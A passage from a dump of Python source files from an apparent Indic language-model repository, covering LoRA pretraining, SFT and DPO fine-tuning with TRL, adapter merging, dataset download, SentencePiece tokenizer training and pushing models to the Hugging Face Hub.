model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
    main()
| 20,961 | Python | .py | 407 | 42.432432 | 119 | 0.656131 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,530 | SFT_finetune.py | adithya-s-k_Indic-llm/scripts/SFT_finetune.py |
# Copyright 2023 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# regular:
python examples/scripts/sft.py \
--model_name_or_path="facebook/opt-350m" \
--report_to="wandb" \
--learning_rate=1.41e-5 \
--per_device_train_batch_size=64 \
--gradient_accumulation_steps=16 \
--output_dir="sft_openassistant-guanaco" \
--logging_steps=1 \
--num_train_epochs=3 \
--max_steps=-1 \
--push_to_hub \
--gradient_checkpointing \
# peft:
python examples/scripts/sft.py \
--model_name_or_path="facebook/opt-350m" \
--report_to="wandb" \
--learning_rate=1.41e-5 \
--per_device_train_batch_size=64 \
--gradient_accumulation_steps=16 \
--output_dir="sft_openassistant-guanaco" \
--logging_steps=1 \
--num_train_epochs=3 \
--max_steps=-1 \
--push_to_hub \
--gradient_checkpointing \
--use_peft \
--lora_r=64 \
--lora_alpha=16
"""
from dataclasses import dataclass, field
import torch
from datasets import load_dataset
from tqdm import tqdm
from transformers import AutoTokenizer, HfArgumentParser, TrainingArguments
from trl import ModelConfig, SFTTrainer, get_kbit_device_map, get_peft_config, get_quantization_config
tqdm.pandas()
@dataclass
class ScriptArguments:
dataset_name: str = field(default="timdettmers/openassistant-guanaco", metadata={"help": "the dataset name"})
dataset_text_field: str = field(default="text", metadata={"help": "the text field of the dataset"})
max_seq_length: int = field(default=512, metadata={"help": "The maximum sequence length for SFT Trainer"})
if __name__ == "__main__":
parser = HfArgumentParser((ScriptArguments, TrainingArguments, ModelConfig))
args, training_args, model_config = parser.parse_args_into_dataclasses()
training_args.gradient_checkpointing_kwargs = dict(use_reentrant=False)
################
# Model & Tokenizer
################
torch_dtype = (
model_config.torch_dtype
if model_config.torch_dtype in ["auto", None]
else getattr(torch, model_config.torch_dtype)
)
quantization_config = get_quantization_config(model_config)
model_kwargs = dict(
revision=model_config.model_revision,
trust_remote_code=model_config.trust_remote_code,
attn_implementation=model_config.attn_implementation,
torch_dtype=torch_dtype,
use_cache=False if training_args.gradient_checkpointing else True,
device_map=get_kbit_device_map() if quantization_config is not None else None,
quantization_config=quantization_config,
)
tokenizer = AutoTokenizer.from_pretrained(model_config.model_name_or_path, use_fast=True)
tokenizer.pad_token = tokenizer.eos_token
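    # Many causal-LM tokenizers (e.g. Llama-style) ship without a pad token; reusing
    # EOS keeps padding and packing functional without adding a token or resizing embeddings.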
################
# Dataset
################
raw_datasets = load_dataset(args.dataset_name)
train_dataset = raw_datasets["train"]
eval_dataset = raw_datasets["test"]
################
# Training
################
trainer = SFTTrainer(
model=model_config.model_name_or_path,
model_init_kwargs=model_kwargs,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
        dataset_text_field=args.dataset_text_field,
max_seq_length=args.max_seq_length,
tokenizer=tokenizer,
packing=True,
peft_config=get_peft_config(model_config),
)
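    # With packing=True, SFTTrainer concatenates tokenized examples into constant-length
    # blocks of max_seq_length instead of padding each sample individually.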
trainer.train()
    trainer.save_model(training_args.output_dir)
| 3,992 | Python | .py | 103 | 34 | 113 | 0.688241 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,531 | DPO_finetune.py | adithya-s-k_Indic-llm/scripts/DPO_finetune.py |
# Copyright 2023 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# regular:
python examples/scripts/dpo.py \
--model_name_or_path=gpt2 \
--per_device_train_batch_size 4 \
--max_steps 1000 \
--learning_rate 1e-3 \
--gradient_accumulation_steps 1 \
--logging_steps 10 \
--eval_steps 500 \
--output_dir="dpo_anthropic_hh" \
--warmup_steps 150 \
--report_to wandb \
--bf16 \
--logging_first_step \
--no_remove_unused_columns
# peft:
python examples/scripts/dpo.py \
--model_name_or_path=gpt2 \
--per_device_train_batch_size 4 \
--max_steps 1000 \
--learning_rate 1e-3 \
--gradient_accumulation_steps 1 \
--logging_steps 10 \
--eval_steps 500 \
--output_dir="dpo_anthropic_hh" \
--optim rmsprop \
--warmup_steps 150 \
--report_to wandb \
--bf16 \
--logging_first_step \
--no_remove_unused_columns \
--use_peft \
--lora_r=16 \
--lora_alpha=16
"""
from dataclasses import dataclass, field
from typing import Dict, Optional
import torch
from datasets import Dataset, load_dataset
from transformers import AutoModelForCausalLM, AutoTokenizer, HfArgumentParser, TrainingArguments
from trl import DPOTrainer, ModelConfig, get_kbit_device_map, get_peft_config, get_quantization_config
@dataclass
class ScriptArguments:
beta: float = field(default=0.1, metadata={"help": "the beta parameter for DPO loss"})
max_length: int = field(default=512, metadata={"help": "max length of each sample"})
max_prompt_length: int = field(default=128, metadata={"help": "max length of each sample's prompt"})
    max_target_length: int = field(
        default=128, metadata={"help": "Maximum target length of each sample. Only used for encoder-decoder models."}
    )
sanity_check: bool = field(default=True, metadata={"help": "only train on 1000 samples"})
ignore_bias_buffers: bool = field(
default=False,
metadata={
"help": "debug argument for distributed training;"
"fix for DDP issues with LM bias/mask buffers - invalid scalar type,`inplace operation. See"
"https://github.com/huggingface/transformers/issues/22482#issuecomment-1595790992"
},
)
generate_during_eval: bool = field(default=False, metadata={"help": "Generate during evaluation"})
def extract_anthropic_prompt(prompt_and_response):
"""Extract the anthropic prompt from a prompt and response pair."""
search_term = "\n\nAssistant:"
search_term_idx = prompt_and_response.rfind(search_term)
assert search_term_idx != -1, f"Prompt and response does not contain '{search_term}'"
return prompt_and_response[: search_term_idx + len(search_term)]
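def _extract_prompt_example():
    """Illustrative sketch; not called anywhere in this script."""
    sample = "\n\nHuman: Hi\n\nAssistant: Hello!"
    # The prompt keeps everything up to and including the last Assistant marker.
    assert extract_anthropic_prompt(sample) == "\n\nHuman: Hi\n\nAssistant:"
    return extract_anthropic_prompt(sample)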
def get_hh(split: str, sanity_check: bool = False, silent: bool = False, cache_dir: Optional[str] = None) -> Dataset:
"""Load the Anthropic Helpful-Harmless dataset from Hugging Face and convert it to the necessary format.
The dataset is converted to a dictionary with the following structure:
{
'prompt': List[str],
'chosen': List[str],
'rejected': List[str],
}
Prompts should be structured as follows:
\n\nHuman: <prompt>\n\nAssistant:
Multiple turns are allowed, but the prompt should always start with \n\nHuman: and end with \n\nAssistant:.
"""
dataset = load_dataset("Anthropic/hh-rlhf", split=split, cache_dir=cache_dir)
if sanity_check:
dataset = dataset.select(range(min(len(dataset), 1000)))
def split_prompt_and_responses(sample) -> Dict[str, str]:
prompt = extract_anthropic_prompt(sample["chosen"])
return {
"prompt": prompt,
"chosen": sample["chosen"][len(prompt) :],
"rejected": sample["rejected"][len(prompt) :],
}
return dataset.map(split_prompt_and_responses)
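# Resulting record shape (illustrative values):
#   {"prompt": "\n\nHuman: ...\n\nAssistant:",
#    "chosen": " Sure, here is ...", "rejected": " I can't help."}
# DPOTrainer consumes exactly these three text fields.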
if __name__ == "__main__":
parser = HfArgumentParser((ScriptArguments, TrainingArguments, ModelConfig))
args, training_args, model_config = parser.parse_args_into_dataclasses()
################
# Model & Tokenizer
################
torch_dtype = (
model_config.torch_dtype
if model_config.torch_dtype in ["auto", None]
else getattr(torch, model_config.torch_dtype)
)
quantization_config = get_quantization_config(model_config)
model_kwargs = dict(
revision=model_config.model_revision,
trust_remote_code=model_config.trust_remote_code,
attn_implementation=model_config.attn_implementation,
torch_dtype=torch_dtype,
use_cache=False if training_args.gradient_checkpointing else True,
device_map=get_kbit_device_map() if quantization_config is not None else None,
quantization_config=quantization_config,
)
model = AutoModelForCausalLM.from_pretrained(model_config.model_name_or_path, **model_kwargs)
peft_config = get_peft_config(model_config)
if peft_config is None:
model_ref = AutoModelForCausalLM.from_pretrained(model_config.model_name_or_path, **model_kwargs)
else:
model_ref = None
tokenizer = AutoTokenizer.from_pretrained(model_config.model_name_or_path)
if tokenizer.pad_token is None:
tokenizer.pad_token = tokenizer.eos_token
if args.ignore_bias_buffers:
# torch distributed hack
model._ddp_params_and_buffers_to_ignore = [
name for name, buffer in model.named_buffers() if buffer.dtype == torch.bool
]
################
# Dataset
################
train_dataset = get_hh("train", sanity_check=args.sanity_check)
eval_dataset = get_hh("test", sanity_check=args.sanity_check)
################
# Training
################
trainer = DPOTrainer(
model,
model_ref,
args=training_args,
beta=args.beta,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
tokenizer=tokenizer,
max_length=args.max_length,
max_target_length=args.max_target_length,
max_prompt_length=args.max_prompt_length,
generate_during_eval=args.generate_during_eval,
peft_config=get_peft_config(model_config),
)
trainer.train()
    trainer.save_model(training_args.output_dir)
| 6,789 | Python | .py | 161 | 36.478261 | 117 | 0.678264 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,532 | merge_lora.py | adithya-s-k_Indic-llm/scripts/merge_lora.py |
import argparse
import logging
import torch
from datasets import Dataset
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
def merge_adapter(base_model_path, target_model_path, adapter_path):
logger.info("Loading adapter...")
model = AutoModelForCausalLM.from_pretrained(
base_model_path,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
trust_remote_code=True,
)
model = PeftModel.from_pretrained(model, adapter_path)
tokenizer = AutoTokenizer.from_pretrained(
base_model_path,
trust_remote_code=True,
)
model = model.merge_and_unload()
logger.info("Saving target model...")
model.save_pretrained(target_model_path)
tokenizer.save_pretrained(target_model_path)
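# Example invocation (all paths and model ids are placeholders):
#   python merge_lora.py \
#       --base_model_path meta-llama/Llama-2-7b-hf \
#       --target_model_path ./merged-model \
#       --adapter_path ./output/pt_lora_model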
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Merge a PEFT adapter with a base model"
)
parser.add_argument(
"--base_model_path", required=True, help="Path to the base model"
)
parser.add_argument(
"--target_model_path", required=True, help="Path to save the target model"
)
parser.add_argument(
"--adapter_path", required=True, help="Path to the adapter model"
)
args = parser.parse_args()
try:
merge_adapter(
base_model_path=args.base_model_path,
target_model_path=args.target_model_path,
adapter_path=args.adapter_path,
)
except Exception as e:
logger.error(f"Failed to merge adapter weights: {e}") | 1,717 | Python | .py | 50 | 28.5 | 82 | 0.678938 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,533 | download_dataset.py | adithya-s-k_Indic-llm/scripts/download_dataset.py |
import sys
import os
import json
import shutil
import logging
import argparse
from tqdm import tqdm
import pandas as pd
from datasets import load_dataset
from dataclasses import asdict
from pathlib import Path
wd = Path(__file__).parent.parent.resolve()
sys.path.append(str(wd))
from indic_llm.dataset import download_dataset, download_convert_to_txt
from indic_llm import print_indic_llm_text_art
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
class DownloadDataset():
def __init__(self) -> None:
pass
def run(self):
parser = argparse.ArgumentParser(
description="Download Hugging Face dataset."
)
parser.add_argument(
"--hf-dataset",
required=True,
help="Name of the Hugging Face dataset (e.g., 'imdb').",
)
        parser.add_argument(
            "--hf-subset",
            required=False,
            help="Name of the subset/config (e.g., the language) inside the dataset",
        )
parser.add_argument(
"--dataset-split",
default="train",
help="Dataset split to use (default: 'train').",
)
        parser.add_argument(
            "--generate-corpus",
            type=lambda x: str(x).lower() in ("true", "1", "yes"),
            required=False,
            default=False,
            help="Generate a text corpus from the dataset (pass True or False)",
        )
parser.add_argument(
"--text-column",
type=str,
required=False,
default="text",
help="the text column of the dataset to concatenate and create the text corpus"
)
        parser.add_argument(
            "--output-file-name",
            type=str,
            required=False,
            default="corpus.txt",
            help="name of the output corpus text file, e.g. {dataset_name}.txt",
        )
parser.add_argument(
"--output-dir",
type=str,
required=False,
default="./corpus",
help="name of the output directory where you want to save text corpus"
)
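        # Example invocation (dataset/subset names are placeholders):
        #   python download_dataset.py --hf-dataset wikimedia/wikipedia \
        #       --hf-subset 20231101.kn --dataset-split train --generate-corpus True \
        #       --text-column text --output-file-name kannada_corpus.txt --output-dir ./corpus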
args = parser.parse_args()
# Initialize logger with appropriate log level
# Log parsed arguments
logger.info("Parsed arguments:")
for arg, value in vars(args).items():
logger.info(f"{arg}: {value}")
print_indic_llm_text_art()
logger.setLevel(logging.INFO)
        # If corpus generation is requested, validate the corpus options before downloading.
if args.generate_corpus == True:
assert args.text_column != "", "Text column must not be empty"
assert args.output_file_name != "", "Output file name must not be empty"
assert args.output_file_name.endswith(".txt"), "Output file name should end with '.txt'"
download_convert_to_txt(
args.hf_dataset,
args.hf_subset,
args.dataset_split,
args.text_column,
args.output_file_name,
args.output_dir
)
# if generate corpus is false
elif args.generate_corpus == False:
download_dataset(
args.hf_dataset,
args.hf_subset,
args.dataset_split
)
else:
logger.error("Invalid input for --generate_corpus. Use 'True' or 'False'.")
if __name__ == "__main__":
    downloader = DownloadDataset()
    downloader.run()
| 3,701 | Python | .py | 105 | 25.295238 | 100 | 0.577628 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,534 | tokenizer.py | adithya-s-k_Indic-llm/scripts/tokenizer.py |
import sys
import os
import json
import shutil
import logging
import argparse
from tqdm import tqdm
import pandas as pd
from datasets import load_dataset
from dataclasses import asdict
from pathlib import Path
wd = Path(__file__).parent.parent.resolve()
sys.path.append(str(wd))
from indic_llm.tokenization import SentencePieceTrainer
from indic_llm import print_indic_llm_text_art
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
class TokenizerCLI(SentencePieceTrainer):
def __init__(self) -> None:
super().__init__()
def run(self):
parser = argparse.ArgumentParser(
description="Tokenizer Script"
)
# Train arguments
parser.add_argument("--train", action="store_true", help="Enable training the tokenizer.")
parser.add_argument("--input-file", required=True, help="Path to the input text corpus file (should be a .txt file).")
parser.add_argument("--output-dir", default="./models", help="Directory to save the trained model and vocabulary.")
parser.add_argument("--model-prefix", default="SP_tokenizer", help="Name to save the SentencePiece model as.")
parser.add_argument("--vocab-size", type=int, default=self.vocab_size, help="Total vocabulary size of the tokenizer.")
parser.add_argument("--character-coverage", type=float, default=self.character_coverage, help="Character coverage for the model (default: 1.0).")
parser.add_argument("--model-type", default=self.model_type, choices=["bpe", "unigram", "char", "word"], help="Type of SentencePiece model.")
# Merge arguments
parser.add_argument("--merge", action="store_true", help="Enable merging two tokenizers.")
parser.add_argument("--base-tokenizer", type=str, help="Base tokenizer name or path.")
parser.add_argument("--trained-tokenizer", type=str, help="Tokenizer name or path to merge with the base tokenizer.")
# Test arguments
parser.add_argument("--test", action="store_true", help="Enable testing the tokenizer.")
parser.add_argument("--tokenizer-model", type=str, help="Name or path of the tokenizer model.")
parser.add_argument("--text", type=str, help="Input text to tokenize.")
        # Count Indic tokens arguments (reuses --tokenizer-model from the test group above)
        parser.add_argument("--count-indic-tokens", action="store_true", help="Count the number of Indic tokens using UTF-8 ranges.")
args = parser.parse_args()
# Initialize logger with appropriate log level
# Log parsed arguments
logger.info("Parsed arguments:")
for arg, value in vars(args).items():
logger.info(f"{arg}: {value}")
print_indic_llm_text_art()
logger.setLevel(logging.INFO)
self.vocab_size = args.vocab_size # 20000 by default
self.character_coverage = args.character_coverage # 1.0 by default
self.model_type = args.model_type #[BPE, unigram, char, word]
        os.makedirs(args.output_dir, exist_ok=True)
        if args.train:
            self.train_tokenizer(args.input_file, args.model_prefix, args.output_dir)
elif args.merge:
            self.merge_tokenizer(args.base_tokenizer, args.trained_tokenizer, args.merged_output)
elif args.test:
self.test_tokenizer(args.tokenizer_model, args.text)
elif args.count_indic_tokens:
            self.count_language_tokens(args.tokenizer_model)
# elif args.test_dataset:
# pass # feature to be added
else:
logger.error("Please provide either --train or --merge or --test option.")
if __name__ == "__main__":
tokenizer = TokenizerCLI()
    tokenizer.run()
| 3,925 | Python | .py | 73 | 46 | 153 | 0.679609 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,535 | push_to_hf.py | adithya-s-k_Indic-llm/scripts/push_to_hf.py |
import argparse
import json
import logging
import os
from accelerate.state import PartialState
from huggingface_hub import HfApi
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
def push_to_hub(target_model_path, repo_id, hf_token):
if PartialState().process_index == 0:
logger.info("Pushing model to hub...")
if os.path.exists(f"{target_model_path}/training_params.json"):
training_params = json.load(
open(f"{target_model_path}/training_params.json")
)
# Optionally, remove sensitive info if needed
# training_params.pop("token")
json.dump(
training_params, open(f"{target_model_path}/training_params.json", "w")
)
api = HfApi(token=hf_token)
api.create_repo(repo_id=repo_id, repo_type="model", private=True, exist_ok=True)
api.upload_folder(
folder_path=target_model_path, repo_id=repo_id, repo_type="model"
)
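# Only the rank-0 process uploads in multi-process runs (PartialState().process_index == 0).
# Example invocation (repo id and token are placeholders):
#   python push_to_hf.py --target_model_path ./merged-model \
#       --repo_id your-username/your-model --hf_token hf_xxxxxxxx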
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Push model to Hugging Face Hub")
parser.add_argument(
"--target_model_path", required=True, help="Local path to the model directory"
)
parser.add_argument(
"--repo_id", required=True, help="Hugging Face Hub repository ID"
)
parser.add_argument(
"--hf_token", required=True, help="Hugging Face authentication token"
)
args = parser.parse_args()
push_to_hub(
target_model_path=args.target_model_path,
repo_id=args.repo_id,
hf_token=args.hf_token,
    )
| 1,699 | Python | .py | 45 | 30.711111 | 88 | 0.641555 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,536 | pretrain.py | adithya-s-k_Indic-llm/scripts/pretrain.py |
#!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
    except ValueError:  # quick fix: simply repeat the first example across the batch
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
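def _collator_example():
    """Hypothetical sketch (not part of training): same-length features are
    stacked per key; a ragged batch raises ValueError inside the collator, which
    then falls back to repeating the first example."""
    features = [
        {"input_ids": torch.tensor([1, 2, 3]), "labels": torch.tensor([1, 2, 3])},
        {"input_ids": torch.tensor([4, 5, 6]), "labels": torch.tensor([4, 5, 6])},
    ]
    batch = fault_tolerance_data_collator(features)
    return batch["input_ids"].shape  # torch.Size([2, 3])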
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
trainable : Optional[str] = field(default="q_proj,v_proj")
lora_rank : Optional[int] = field(default=8)
lora_dropout : Optional[float] = field(default=0.1)
lora_alpha : Optional[float] = field(default=32.)
modules_to_save : Optional[str] = field(default=None)
debug_mode : Optional[bool] = field(default=False)
peft_path : Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
